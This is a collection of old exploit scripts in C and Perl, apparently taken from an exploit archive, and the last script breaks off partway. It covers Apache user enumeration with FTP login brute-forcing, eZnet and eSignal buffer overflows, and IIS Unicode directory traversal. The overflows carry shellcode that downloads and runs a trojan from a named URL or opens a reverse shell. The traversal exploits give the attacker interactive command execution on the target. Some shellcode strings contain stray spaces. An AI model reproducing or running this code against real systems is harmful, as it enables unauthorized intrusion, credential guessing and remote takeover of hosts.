* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* ~ Proof-of-Concept edition ~
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* Works only against Linux and *BSD boxes.
* Info: http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0065.html
* This is old, but curentlly still actual problem, because 99% of all admins use
* default configuration of apache http server.
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* -d4rkgr3y
*
* sh-2.05b$ ./m00-apache-w00t -t localhost -u test_userlist.txt -b
*
* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
*
* Checking http server [localhost:80]...
* Apache => yes
* Vulnerable => yes
* OS => Mandrake Linux
* Searching for system accounts...
* sergey =>
* m00 =>
* satan => yes
* evil =>
* poison =>
* god =>
* guest =>
* dima =>
* ftp => yes
* vasya =>
* rst =>
* vasi =>
* Searching complete.
* 12 users checked
* 2 users found
* Attempting to log on ftp with login:login...
* satan:satan => no
* ftp:ftp => no
* Complete.
* 0 ftp accounts found
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define DEFAULT_HTTP_PORT 80
#define DEFAULT_FTP_PORT 21
int m00() {
printf("\n Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.\n\n");
printf("\n Downloaded on www.K-OTIK.com\n\n");
}
int verbose(char *d) {
printf("+-----------------------o0o-----------------------+\n");
printf("\n%s",d);
printf("+-----------------------o0o-----------------------+\n");
}
int usage(char *xplname) {
printf("[~] usage: %s -t <host> -u <userlist> [options]\n\n",xplname);
printf("Options:\n");
printf("-p <port> - http port [80]\n");
printf("-l <log_file> - log all attempts to file\n");
printf("-b - try to log on ftp with guessed logins (public version only login:login)\n");
printf("-h - usage\n");
printf("\n");
exit(0);
}
int attempt(char *argv);
int conn(char *ip, unsigned short port) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(ip))==-1) {
if ((hs=gethostbyname(ip))==NULL) {
perror("[-] Error"); exit(0);
}
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("[-] Error"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("[-] Error "); exit(0);
}
return(sockfd);
}
int main(int argc, char *argv[]) {
FILE *userlist, *logfile;
char *file=NULL;
char *lfile=NULL;
char *host=NULL;
char buf[0x20], check[0x20], request[0xc8], answer[0x3e8], c,logd[0x30];
int i,hand,x,f,v=0,brute=0;
int port = DEFAULT_HTTP_PORT;
int fport = DEFAULT_FTP_PORT;
char c200[0x05] =
"\x20\x32\x30\x30\x20";
char c403[0x0e] =
"\x34\x30\x33\x20\x46\x6f"
"\x72\x62\x69\x64\x64\x65\x6e";
char c404[0x0e] =
"\x34\x30\x34\x20\x4e\x6f\x74"
"\x20\x46\x6f\x75\x6e\x64";
char signature[0x0f] =
"\x53\x65\x72\x76\x65\x72\x3a"
"\x20\x41\x70\x61\x63\x68\x65";
char *http =
"Accept: */*\r\n"
"Accept-Language: en-us,en;q=0.5\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"User-Agent: m00-apache-finger\r\n"
"Connection: close\r\n\r\n";
char **logz;
m00();
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:hp:vbl:"))!= EOF) {
switch (c) {
case 't':
host=optarg;
break;
case 'u':
file=optarg;
break;
case 'p':
port=atoi(optarg);
break;
case 'l':
lfile=optarg;
break;
case 'b':
brute=1;
break;
case 'v':
v=1;
break;
case 'h':
usage(argv[0]);
return 1;
default:
usage(argv[0]);
return 1;
}
}
if(host==NULL) { usage(argv[0]); }
if(file==NULL) { usage(argv[0]); }
if(lfile && (logfile = fopen(lfile, "a")) == 0) {
printf("[-] unable to open logfile [%s]\n",lfile);
exit(0);
}
if((userlist = fopen(file, "r")) == 0) {
printf("[-] unable to open userlist [%s]\n",file);
exit(0);
}
logz = (char **)malloc(0x666);
printf(" Checking http server [%s:%i]...\n",host,port);
hand = conn(host,port);
sprintf(request,"HEAD /~root HTTP/1.1\r\nHost: %s\r\n%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
printf(" Apache => ");
if(!strstr(answer,signature)) { printf(" no\n Vulnerable => "); } else printf(" yes\n Vulnerable => ");
if(!strstr(answer,c403)) { printf("no\n[-] Exiting...\n"); exit(0); } else printf("yes\n");
close(hand);
hand = conn(host,port);
sprintf(request,"HEAD /~toor HTTP/1.1\r\nHost: %s\r\n%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
printf(" OS => ");
if(strstr(answer,c403)) { printf("FreeBSD"); } else {
if(strstr(answer,"Unix")) printf("Unix unknow");
if(strstr(answer,"Debian")) printf("Debian Linux");
if(strstr(answer,"RedHat")) printf("RedHat Linux");
if(strstr(answer,"mdk")) printf("Mandrake Linux");
}
close(hand);
printf("\n Searching for system accounts...");
if(lfile) {
sprintf(logd,"Host: %s\nFound accounts:\n",host);
fprintf(logfile,logd);
}
x=0;
f=0;
while (1) {
fgets(buf, 32, userlist);
if (buf[0] == '\n' || strstr(check,buf)) break;
strcpy(check,buf);
buf[strlen(buf)-1] = '\0';
x++;
printf("\n %s \t=> ",buf);
hand = conn(host,port);
sprintf(request,"HEAD /~%s HTTP/1.1\r\nHost: %s\r\n%s",buf,host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
if(!strstr(answer,c404)) {
printf(" yes",buf);
if(lfile) {
sprintf(logd,"%s\n",buf);
fprintf(logfile,logd);
}
logz[f] = (char *)malloc(strlen(buf));
memcpy(logz[f],buf,strlen(buf));
memset(logz[f]+strlen(buf),0x0,1);
f++;
}
close(hand);
}
fclose(userlist);
printf("\n Searching complete.\n");
printf(" %i users checked\n %i users found\n",x,f);
if(brute && f>0) {
x=0;
i=0;
if(lfile) {
sprintf(logd,"FTP:\n");
fprintf(logfile,logd);
}
printf(" Attempting to log on ftp with login:login...\n");
while(x!=f) {
printf(" %s:%s \t=>",logz[x],logz[x]);
hand = conn(host,fport);
sprintf(request,"USER %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
sprintf(request,"PASS %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(strstr(answer,"230")) {
printf(" yes\n");
if(lfile) {
sprintf(logd,"%s:%s\n",logz[x],logz[x]);
fprintf(logfile,logd);
}
i++;
} else printf(" no\n");
close(hand);
x++;
}
printf(" Complete.\n");
printf(" %i ftp accounts found\n",i);
}
if(lfile) {
fprintf(logfile,"\n");
fclose(logfile);
}
}
/* m00 */
// [2003-12-06]
80 Eznet v3.5.0 Remote Stack Overflow and Denial of Service Exploit
#!/usr/bin/perl -w
#
# Stack Overflow in eZnet.exe - Remote Exploit
#
# Will download a trojan from any address which you provide
# on the target system, then will execute the trojan.
#
# For this exploit I have tried several strategies to increase
# reliability and performance:
#
# + Jump to a static 'call esp'
# + Backwards jump to code a known distance from the stack pointer
# since the stack address seems to change for each version of
# eznet.
# + Works out the byte difference for custom urls
# (must be no longer than 254 bytes!!)
# + Causes eznet.exe to restart (not really my choice ;o)
# + Shellcode steals addresses from a static module.
#
# (Shellcode is attached to the bottom of this file!)
#
# - by Peter Winter-Smith [[email protected]]
use IO::Socket;
if(!($ARGV[1]))
{
print "\nUsage: eZnetexploit.pl <victim> <url of trojan>\n" .
" + netcat trojan at http://www.elitehaven.net/ncat.exe\n" .
" + listens on port 9999.\n\n";
exit;
}
print "eZnet.exe remote trojan downloader exploit\n";
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80")
or die "Unable to connect to $ARGV[0] on port 80";
$tlen = chr(length($ARGV[1]) + 1);
$shellcode = "\xEB\x3C\x5F\x55\x89\xE5\x81\xC4" .
"\xE8\xFF\xFF\xFF\x57\x31\xDB\xB3" .
"\x07\xB0\xFF\xFC\xF2\xAE\xFE\x47" .
"\xFF\xFE\xCB\x80\xFB\x01\x75\xF4" .
"\x5F\x57\x8D\x7F\x0B\x57\x8D\x7F" .
"\x13\x57\x8D\x7F\x08\x57\x8D\x7F" .
$tlen .
"\x57\x8D\x7F\x09\x47\x57\x8D" .
"\x54\x24\x14\x52\xEB\x02\xEB\x52" .
"\x89\xD6\xFF\x36\xFF\x15\x1C\x91" .
"\x04\x10\x5A\x52\x8D\x72\xFC\xFF" .
"\x36\x50\xFF\x15\xCC\x90\x04\x10" .
"\x5A\x52\x31\xC9\x51\x51\x8D\x72" .
"\xF0\xFF\x36\x8D\x72\xF4\xFF\x36" .
"\x51\xFF\xD0\x5A\x52\xFF\x72\xEC" .
"\xFF\x15\x1C\x91\x04\x10\x5A\x52" .
"\x8D\x72\xF8\xFF\x36\x50\xFF\x15" .
"\xCC\x90\x04\x10\x5A\x52\x31\xC9" .
"\x41\x51\x8D\x72\xF0\xFF\x36\xFF" .
"\xD0\xCC\xE8\x6B\xFF\xFF\xFF\x55" .
"\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C" .
"\x4C\xFF\x55\x52\x4C\x44\x6F\x77" .
"\x6E\x6C\x6F\x61\x64\x54\x6F\x46" .
"\x69\x6C\x65\x41\xFF\x57\x69\x6E" .
"\x45\x78\x65\x63\xFF" . $ARGV[1] .
"\xFF" .
"\x63\x3A\x5C\x6E\x63\x2E\x65\x78" .
"\x65\xFF\x6B\x65\x72\x6E\x65\x6C" .
"\x33\x32\x2E\x64\x6C\x6C\xFF";
$jmpcode = "\x89\xE0\x66\x2D\x38\x32\xFF\xE0";
$eip = "\xBB\x33\x05\x10";
$packet = "" .
"GET /SwEzModule.dll?operation=login&autologin=" .
"\x90"x65 . $shellcode . "a"x(4375 - length($ARGV[1])) . $eip . "\x90"x20 . $jmpcode .
"\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n";
print $victim $packet;
print " + Making Request ...\n + Trojan should download - best of luck!\n";
sleep(4);
close($victim);
print "Done.\n";
exit;
#-----------------------------[vampiric.asm]------------------------------
# ; 'eZnet.exe' (eZmeeting, eZnetwork, eZphotoshare, eZshare, eZ)
# ; (cryptso.dll vampiric shellcode)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [[email protected]]
#
# bits 32
#
# jmp short killnull
#
# next:
# pop edi
#
# push ebp
# mov ebp, esp
# add esp, -24
#
# push edi
#
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
#
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
#
# pop edi
#
# push edi ; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi ; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi ; 'WinExec'
# lea edi, [edi+08]
# push edi ; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi ; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi ; 'kernel32.dll'
#
# lea edx, [esp+20]
# push edx
#
# jmp short over
# killnull:
# jmp short data
# over:
#
# mov esi, edx
# push dword [esi]
#
# call [1004911ch] ; LoadLibraryA
#
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
#
# push eax
#
# call [100490cch] ; GetProcAddress("URLMON.DLL", URLDownloadToFileA);
#
# pop edx
# push edx
#
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16] ; file path
# push dword [esi]
# lea esi, [edx-12] ; url
# push dword [esi]
# push ecx
#
# call eax
#
# pop edx
# push edx
#
# push dword [edx-20]
#
# call [1004911ch] ; LoadLibraryA
#
# pop edx
# push edx
#
#
# lea esi, [edx-08]
# push dword [esi] ; 'WinExec'
# push eax ; kernel32.dll handle
#
# call [100490cch] ; GetProcAddress("kernel32.dll", WinExec);
#
# pop edx
# push edx
#
# xor ecx, ecx
# inc ecx
# push ecx
#
# lea esi, [edx-16] ; file path
# push dword [esi]
#
# call eax
#
# int3
#
# ta:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ; db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ; push edi ; 'http://www.elitehaven.net/ncat.exe'
# ; lea edi, [edi+35]
# ; and make it:
# ; push edi ; 'http://www.site.com/someguy/trojan.exe'
# ; lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#-------------------------------------------------------------------------
#------------------------------[subcode.asm]------------------------------
# ; eZnet.exe Sub-Shellcode
# ; [[email protected]]
#
# ;100533BBh
#
# bits 32
#
# mov eax, esp
# sub ax, 3238h
# jmp eax
#-----------------------------------------------
# [2003-12-15]
80 Eznet 3.5.0 Remote Stack Overflow Universal Exploit
#!/usr/bin/perl -w
#########C###O###R###O###M###P###U###T###E###R#### #######
# [Crpt] universal eZ v3.3 < v3.5 remote exploit by kralor [Crpt] #
#----------------------------------------------------------------------------------------#
# versions tested & not vulnerables: v3.0 v3.1 v3.2 #
# versions tested & vulnerables: v3.3 v3.4 v3.5 #
# Cryptso.dll contains a 'static' jmp esp in eZnetwork pack from v3.3 to v3.5 #
# It is a trivial exploit, jumping to esp, then at esp we jump backward to #
# finally reach the shellcode. The shellcode gives a reverse remote shell. #
# Universal shellcode coded by kralor with the PEB technic. #
######W#W#W#.#C#O#R#O#M#P#U#T#E###R###.###N###E### T######
use IO::Socket;
print "\r\n\t [Crpt] eZ v3.3 < v3.5 remote exploit by kralor [Crpt]\r\n";
print "\t\twww.coromputer.net && undernet #coromputer\r\n\r\n";
if(@ARGV<3||@ARGV>3) {
print "syntax: ".$0." <victim> <your_ip> <your_port>\r\n";
exit;
}
print "[+] Connecting to ".$ARGV[0]."\t...";
my $sock = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80");
if(!$sock) {
print "Error\r\n";
exit;
}
print "Done\r\n";
# 0xffe4 jmp esp in Cryptso.dll (v3.3 v3.4 v3.5 @ 0x1004C72B)
# 0xffffedffe9 jmp back ($ - 4'608)
$eip = "\x2B\xC7\x04\x10";
$jmp_back = "\xE9\xFF\xED\xFF\xFF";
# universal reverse remote shell using PEB, coded by kralor.
$shellc0deI = "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\x ec\x50\xe8\xef".
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\x9e\x 01\x80\x33\x95".
"\x43\xe2\xfa\x7e\xe6\xa6\x4e\x26\xa5\xf1\x1e\x96\x 1e\xd5\x99\x1e".
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\x e1\xb1\x91\xad".
"\x8b\xe0\xd9\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\x ce\xed\x96\x4d".
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x 1e\xc6\xb5\x96".
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\x b1\x81\x1e\xa3".
"\xae\xe1\xb1\x8d\xe1\x9f\xde\xb6\x4e\xe0\x7f\xcd\x cd\xa6\x55\x56".
"\xca\xa6\x5c\xf3\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x 91\x92\x56\x1e".
"\x8d\x1e\x56\xae\x54\xe0\x08\x56\xa6\x4e\xfd\xec\x d0\xed\xd4\xff".
"\x9f\xff\xde\xc6\x7d\xe9\x6a\x6a\x6a\xa6\x5c\x52\x d0\x69\xe2\xe6".
"\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8\x97\x1e\x 48\xf3\x16\x7e".
"\x91\xc4\xc4\xc6\x6a\x45\xa6\x4e\x1c\xd0\x91\xfd\x e7\xf0\xe6\xe6".
"\xff\x9f\xff\xde\xc6\x7d\xde\x6a\x6a\x6a\x1e\xc8\x 91\xa6\x6a\x52".
"\xd0\x69\xc2\xc6\xd4\xc6\x52\xd0\x95\xfa\xf6\xfe\x f0\x1c\xe8\x91".
"\xf3\x52\xd0\x91\xe1\xd4\x1e\x58\xf3\x16\x7c\x91\x c4\xc6\x6a\x45".
"\xa6\x4e\xc6\xc6\xc6\xc6\xd6\xc6\xd6\xc6\x6a\x45\x 1c\xd0\x31\xfd".
"\xfb\xf0\xf6\xe1\xff\x96\xff\xc6\xff\x97\x7d\x93\x 6a\x6a\x6a\xa6".
"\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x 97";
$shellc0deII = "\xff\x85\xc0\x6a\xe0\x31\x6a\x45\xa6".
"\x4e\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xc6\x7d\x 40\x6b\x6a\x6a".
"\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x 1c\xc8\x2d\x1c".
"\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\x c8\x5d\x52\xd0".
"\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\x c8\x31\x1c\xc8".
"\x71\x1c\xc8\x7d\x1c\xc8\x79\xa6\x4e\x18\xd8\x65\x c4\x18\xd8\x39".
"\xc4\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\x f6\xf8\xf3\x52".
"\xd0\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x 6a\x45\xa6\x4e".
"\xfd\xed\xfc\xe1\xc5\xff\x94\xff\xde\xc6\x7d\xf3\x 6b\x6a\x6a\x6a".
"\x45\x95";
my $tip = inet_aton($ARGV[1]);
my $paddr = sockaddr_in($ARGV[2], $tip);
$paddr=substr($paddr,2,6);
$paddr=$paddr^"\x95\x95\x95\x95\x95\x95";
my $rport=substr($paddr,0,2);
my $rip=substr($paddr,2,4);
$request = "GET /SwEzModule.dll?operation=login&autologin=".
"\x90"x100 .$shellc0deI.$rport."\x96\x46\x52\x97".$rip.$shellc0deII.
"\x90"x4103 .$eip."\x90"x4 .$jmp_back." HTTP/1.0\r\n\r\n";
print $sock $request;
print "[+] Sending evil request\t...";
close($sock);
print "Done\r\n";
exit;
# [2003-12-18]
80 eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit
#!/usr/bin/perl
#
# eSignal v7.6 remote exploit (c) VizibleSoft =*= http://viziblesoft.com/insect
#
# 25-mAR-2004
#
use IO::Socket;
sub usage
{
die("\nUsage: perl $0 host port\n");
}
print "\r\neSignal v7.6 remote exploit, (c) VizibleSoft.com\r\n";
my $ip = $ARGV[0] || usage();
my $port = $ARGV[1] || usage();
my $data = "";
my $ret = "\xf3\x7b\x20\x7c"; # MFC71.dll "jmp esp"
my $nop = "\x90";
#
# Used api..
#
$api = "\x00wininet.dll\x00InternetOpenA\x00".
"InternetOpenUrlA\x00InternetReadFile\x00kernel32.d ll\x00".
"_lcreat\x00_lwrite\x00_lclose\x00";
#
# Url of file to execute
#
$url = "http://viziblesoft.com/insect/sploits/troy.exe";
#
#
# Filename for our file on remote system
$fname = "setup.exe";
#
#
# Shellcode: downloads and executes file at URL
#
$shellc = "\x90".
"\x8B\xEC\x03\xEA\xB8\xEA\xFE\xFF\xFF\xF7\xD0\x03\x E8\x83\xC5\x0B\x8B\xFD\x4F\xF7".
"\x17\x83\xC7\x04\x83\x3F\xFF\x7C\xF6\xF7\x17\xB8\x 5C\x12\x14\x7C\x8B\x18\x55\xFF".
"\xD3\x8B\xF8\x33\xC9\xB1\x03\x8D\x55\x0C\xB8\x58\x 12\x14\x7C\x8B\x18\x51\x52\x52".
"\x57\xFF\xD3\x5A\x59\x89\x02\x83\xC2\x03\x42\x8A\x 02\x3A\xC5\x7F\xF9\x42\xFE\xC9".
"\x3A\xCD\x7F\xDE\xB8\x5C\x12\x14\x7C\x8B\x18\x8D\x 55\x3C\x52\xFF\xD3\x8B\xF8\xB8".
"\x58\x12\x14\x7C\x8B\x18\x53\x8D\x55\x49\x52\x52\x 57\xFF\xD3\x5A\x89\x02\x8B\x1C".
"\x24\x8D\x55\x51\x52\x52\x57\xFF\xD3\x5A\x89\x02\x 5B\x8D\x55\x59\x52\x52\x57\xFF".
"\xD3\x5A\x89\x02\x33\xD2\x52\x52\x52\x52\x55\xFF\x 55\x0C\x33\xD2\x52\xB6\x80\xC1".
"\xE2\x10\x52\x33\xD2\x52\x52\x8D\x4D\x60\x41\x51\x 50\xFF\x55\x1A\x89\x45\x1A\x33".
"\xD2\x52\x8D\x55\xF6\x52\xFF\x55\x49\x89\x45\x49\x 33\xD2\xB6\x02\x2B\xE2\x83\xEC".
"\x04\x33\xD2\xB6\x02\x54\x8B\xC4\x83\xC0\x08\x52\x 50\x8B\x45\x1A\x50\xFF\x55\x2B".
"\x8B\x04\x24\x8D\x54\x24\x04\x50\x52\x8B\x45\x49\x 50\xFF\x55\x51\x83\x3C\x24\x01".
"\x7D\xD7\x8B\x45\x49\x50\xFF\x55\x59\x8D\x55\xF6\x 52\xB8\x3F\x0E\x81\xF8\x35\x80".
"\x80\x80\x80\xFF\xD0\xB8\xD3\xFC\x80\xF8\x35\x80\x 80\x80\x80\xFF\xE0$fname";
$movsb = "\x90\x33\xc9\xb5\x02\xb1\xcc\x8b\xf4\x2b\xf1\x8b\x fc\x33\xd2\xb2\x15\x03\xfa\xf3\xa4";
#
# xor data block
#
$url = $api . $url;
for(my $i=0; $i<length($url); $i++) {
$data = $data . (substr($url, $i, 1) ^ "\xff");
};
$data .= "\xff\xff\xfe\xfe\xff\xff\xff\xff";
#
# construct overflow string...
#
$shellc .= $data;
$shellc .= ("\xcc" x (712 - length($shellc)));
$shellcode = $nop x (8 * 16) .
$shellc .
$ret .
$movsb .
$nop x (191-16);
# print "shellcode len: " . length($shellcode) . "\r\n";
$data = '<STREAMQUOTE>' . $shellcode . '</STREAMQUOTE>';
# print "sending data of len: " . length($data) . "\n";
print sendraw($data);
print "[+] Overflow sent / file executed!\n";
exit;
sub sendraw {
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("[-] inet_aton problems");
socket(S,2,1,getprotobyname('tcp')||0) || die("[-] Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("[-] Can't connect...\n"); }}
# [2004-03-26]
80 MS Windows IIS Unicode Remote Transversal Bug
/* ii*** iis exploit (<- nost's idea) v2
* --------------------------------------
* Okay.. the first piece of code was not really finished.
* So, i apologize to everybody..
*
* by incubus <[email protected]>
*
* grtz to: Bio, nos, zoa, reg and vor... (who else would stay up
* at night to exploit this?) to securax (#securax@efnet) - also
* to kim, glyc, s0ph, tessa, lamagra and steven.
*/
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
int main(int argc, char **argv){
char buffy[666]; /* well, what else? I dunno how long your commands are.. */
char buf[500];
char rcvbuf[8192];
int i, sock, result;
struct sockaddr_in name;
struct hostent *hostinfo;
if (argc < 2){
printf ("try %s www.server.com\n", argv[0]);
printf ("will let you play with cmd.exe of an IIS4/5 server.\n");
printf ("by incubus <[email protected]>\n\n");
exit(0);
}
printf ("\nii*** - iis 4 and 5 exploit\n---------------------------\n");
printf ("act like a cmd.exe kiddie, type quit to quit.\n");
for (;;)
{
printf ("\n[enter cmd> ");
gets(buf);
if (strstr(buf, "quit")) exit(0);
i=0;
while (buf[i] != '\n'){
if(buf[i] == 32) buf[i] = 43;
i++;
}
hostinfo=gethostbyname(argv[1]);
if (!hostinfo){
herror("Oops"); exit(-1);
}
name.sin_family=AF_INET; name.sin_port=htons(80);
name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
sock=socket(AF_INET, SOCK_STREAM, 0);
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
if (result != 0) { herror("Oops"); exit(-1); }
if (sock < 0){
herror("Oops"); exit(-1);
}
strcpy(buffy,"GET /scripts/..\%c0%af../winnt/system32/cmd.exe?/c+");
strcat(buffy,buf);
strcat(buffy, " HTTP/1.0\n\n");
send(sock, buffy, sizeof(buffy), 0);
recv(sock, rcvbuf, sizeof(rcvbuf), 0);
printf ("%s", rcvbuf);
close(sock);
}
}
// [2000-11-18]
80 MS Windows IIS Unicode Remote Transversal Bug (2)
/************************************************** **************************\
** **
** Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit **
** proof of theory exploit cuz it's wednesday and i'm on the couch **
** **
** brought to you by the letter B, the number 7, optyx, and t12 **
** optyx - <[email protected] [email protected]> **
** t12 - <[email protected]> **
** **
** greetz go out to aempirei, a gun toatin' gangstah' hustler' player **
** mother****er who isn't with us anymore, miah, who's GTA2 game was **
** was most entertaining tonight, Cathy, who provided the trippy light **
** to stare at, and to KT, for providing me with hours of decent **
** conversation. **
** **
\************************************************* ***************************/
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
void usage(void)
{
fprintf(stderr, "usage: ./iis-zank <-t target> <-c 'command' or -i>");
fprintf(stderr, " [-p port] [-t timeout]\n");
exit(-1);
}
int main(int argc, char **argv)
{
int i, j;
int port=80;
int timeout=3;
int interactive=0;
char temp[1];
char host[512]="";
char cmd[1024]="";
char request[8192]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
struct hostent *he;
struct sockaddr_in s_addr;
printf("iis-zank_bread_chafer_8000_super_alpha_hyper_pickle.c\ n");
printf("by optyx and t12\n");
for(i=0;i<argc;i++)
{ if(argv[i][0] == '-') {
for(j=1;j<strlen(argv[i]);j++)
{
switch(argv[i][j])
{
case 't':
strncpy(host, argv[i+1], sizeof(host));
break;
case 'c':
strncpy(cmd, argv[i+1], sizeof(cmd));
break;
case 'h':
usage();
break;
case 'o':
timeout=atoi(argv[i+1]);
break;
case 'p':
port=atoi(argv[i+1]);
break;
case 'i':
interactive=1;
break;
default:
break;
}
}
}
}
if(!strcmp(host, ""))
{
fprintf(stderr, "specify target host\n");
usage();
}
if(!strcmp(cmd, "") && !interactive)
{
fprintf(stderr, "specify command to execute\n");
usage();
}
printf("]- Target - %s:%d\n", host, port);
if(!interactive)
printf("]- Command - %s\n", cmd);
printf("]- Timeout - %d seconds\n", timeout);
if((he=gethostbyname(host)) == NULL)
{
fprintf(stderr, "invalid target\n");
usage();
}
do
{
if(interactive)
{
cmd[0]=0;
printf("\nC> ");
if(fgets(cmd, sizeof(cmd), stdin) == NULL)
fprintf(stderr, "gets() error\n");
cmd[strlen(cmd)-1]='\0';
if(!strcmp("exit", cmd))
exit(-1);
}
for(i=0;i<strlen(cmd);i++)
{
if(cmd[i]==' ')
cmd[i]='+';
}
strncpy(request,
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+",
sizeof(request));
strncat(request, cmd, sizeof(request) - strlen(request));
strncat(request, "\n", sizeof(request) - strlen(request));
s_addr.sin_family = PF_INET;
s_addr.sin_port = htons(port);
memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr,
sizeof(s_addr.sin_addr));
if((i=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
fprintf(stderr, "cannot create socket\n");
exit(-1);
}
alarm(timeout);
j = connect(i, (struct sockaddr *) &s_addr, sizeof(s_addr));
alarm(0);
if(j==-1)
{
fprintf(stderr, "cannot connect to %s\n", host);
exit(-1);
close(i);
}
if(!interactive)
printf("]- Sending request: %s\n", request);
send(i, request, strlen(request), 0);
if(!interactive)
printf("]- Getting results\n");
while(recv(i,temp,1, 0)>0)
{
alarm(timeout);
printf("%c", temp[0]);
alarm(0);
}
}
while(interactive);
close(i);
return 0;
}
// [2000-11-18]
80 MS Windows IIS Unicode Remote Transversal Bug (3)
#!/usr/bin/perl
#
# IIS 4.0/5.0 Unicode Exploit
# Checks for each script that has been posted on the BugTraq Lis
# Shouts to bighawk(thats for help), datagram, Ghost Rider, The Duke, p4, kript0n and others
# Since It Uses fork(), you gotta keep up with whats happening. Or Just Let it run and it will
# log sites in the log_unicode.log.
# So Simple
# Use Socket
use Socket;
# incase no arguements or less arguements are given
if(@ARGV == '0' || @ARGV < 2) { die "IIS 4.0/5.0 Unicode Exploit\n".
"Programmed by SteeLe\n".
"Usage: ./$0 <single host> <dir for exploit>\n"; }
# Variables
$blah = $ARGV[0];
$port = 80;
$dir = $ARGV[1];
$timeout = 4;
# see if file is there,
if (-e "$blah") {
open(T, "$blah") || die "can't open $blah\n";
@target = <T>;
close(T);
}
else { @target[0] = $blah; } # what you think is blah
# all scripts mentioned on bugtraq, we know rfp knows more.
